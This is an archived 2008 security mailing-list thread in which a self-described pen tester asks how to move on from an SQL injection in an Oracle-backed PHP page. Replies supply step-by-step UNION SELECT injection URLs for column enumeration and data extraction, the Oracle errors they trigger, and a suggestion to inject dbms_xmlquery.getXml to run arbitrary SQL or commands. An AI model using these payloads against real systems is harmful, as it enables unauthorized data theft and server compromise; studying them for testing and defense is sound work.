Re: Oracle URL SQL Injection issue

From: Cesar (cesarc56@yahoo.com)
Date: Wed Jan 23 2008 - 18:37:01 EST


Hi

I would recommend first trying to get the source code
if possible : http://x.y.z.a/dbs.inc but I guess it
won't work it should be a secure web server :)

Anyways depending on the Oracle version you can easily
own it, you just need to inject a function and exploit
some known sql injection in Oracle or depending on
permissions you can just run any commands.

http://x.y.z.a/item.php?Id=length(dbms_xmlquery.getXml('your
favority sql injection exploit here or any command'))

Look at :
http://www.argeniss.com/research/HackingDatabases.zip
http://www.argeniss.com/research/OracleSQLInjBHUSA05.zip

Cesar.
--- Clone <c70n3@yahoo.co.in> wrote:

> Thanks Jeff & everyone.
>
> I've moved further after your emails. Really much
> appreciated.
>
> With Jeff's input below I enumerate that there are 2
> columns.
>
> This time I gave
>
>
http://x.y.z.a/item.php?Id=90%20union%20select%201,1%20from%20usr
>
> Now I get following error:
>
> ociexecute() [function.ociexecute]: OCIStmtExecute:
> ORA-01790: expression must have same datatype as
> corresponding expression in dbs.inc on line 44
>
> The I tried following:
>
>
http://x.y.z.a/item.php?Id=90%20union%20select%201,'a'%20from%20usr
>
>
http://x.y.z.a/item.php?Id=90%20union%20select%201,1%20from%20usr
>
> And get the error
>
> ociexecute() [function.ociexecute]: OCIStmtExecute:
> ORA-00911: invalid character in dbs.inc on line 44
>
> The functionality of the page is to generate an
> email
> page/forum email page.
>
> Any idea what's next?
>
>
>
> --- jeffrey rivero <jeffr76@yahoo.com> wrote:
>
> > Hello all
> > in your Union start by finding out how many
> columns
> > there are
> > ie.
> >
>
http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%201,1,1%20from%20usr;--
> > would give you 3 columns
> >
>
http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%201,2,3,4%20from%20usr;--
> > would give you 4
> > then once you have that
> > get the data types
> >
>
http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20'a',1,1,1%20from%20usr;--
> > for the first to be a string
> > and so on
> > then you can start to get real data from the
> tables
> > or
> >
>
http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20col1name,col2name,1,'a'%20from%20usr;--
> >
> > Jeff
> >
> > Clone wrote:
> > > Hey List
> > >
> > > I am pen testing a web app that supplies sql
> > > parameters on the URL something like
> > >
> > > http://x.y.z.a/item.php?Id=90
> > >
> > > I did blind sql injection by adding AND 1=1 to
> > confirm
> > > the vulnerability.
> > >
> > > Now when I do
> > >
> > > http://x.y.z.a/item.php?Id=90'
> > >
> > > I get
> > >
> > > ociparse() [function.ociparse]: OCIParse:
> > ORA-01756:
> > > quoted string not properly terminated in
> item.php
> > on
> > > line 312
> > >
> > > Then I tried (after confirming presence of usr
> > table
> > > name)
> > >
> > >
> >
>
http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20*%20from%20usr;--
> > >
> > > and I get the error
> > >
> > > ociexecute() [function.ociexecute]:
> > OCIStmtExecute:
> > > ORA-01789: query block has incorrect number of
> > result
> > > columns in dbs.inc on line 44
> > >
> > > I know one valid user account in the oracle DB.
> > >
> > > Any idea what's the best strategy to move
> forward?
> > >
> > > I'm not getting any further from here so far.
> > >
> > > Any advise / helpo would be much appreciated.
> > >
> > > Cheers'
> > >
> > >
> > >
> > > 5, 50, 500, 5000 - Store N number of mails
> > in your inbox. Go to
> >
>
http://help.yahoo.com/l/in/yahoo/mail/yahoomail/tools/tools-08.html
> > >
> > >
> > >
> >
>
------------------------------------------------------------------------
> > > This list is sponsored by: Cenzic
> > >
> > > Need to secure your web apps NOW?
> > > Cenzic finds more, "real" vulnerabilities fast.
> > > Click to try it, buy it or download a solution
> > FREE today!
> > >
> > > http://www.cenzic.com/downloads
> > >
> >
>
------------------------------------------------------------------------
> > >
> > >
> > >
> >
>
>
>
> Chat on a cool, new interface. No download
> required. Go to
> http://in.messenger.yahoo.com/webmessengerpromo.php
>
>
>
------------------------------------------------------------------------
> This list is sponsored by: Cenzic
>
> Need to secure your web apps NOW?
> Cenzic finds more, "real" vulnerabilities fast.
> Click to try it, buy it or download a solution FREE
> today!
>
> http://www.cenzic.com/downloads
>
------------------------------------------------------------------------
>
>

      ____________________________________________________________________________________
Never miss a thing. Make Yahoo your home page.
http://www.yahoo.com/r/hs

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:58:21 EDT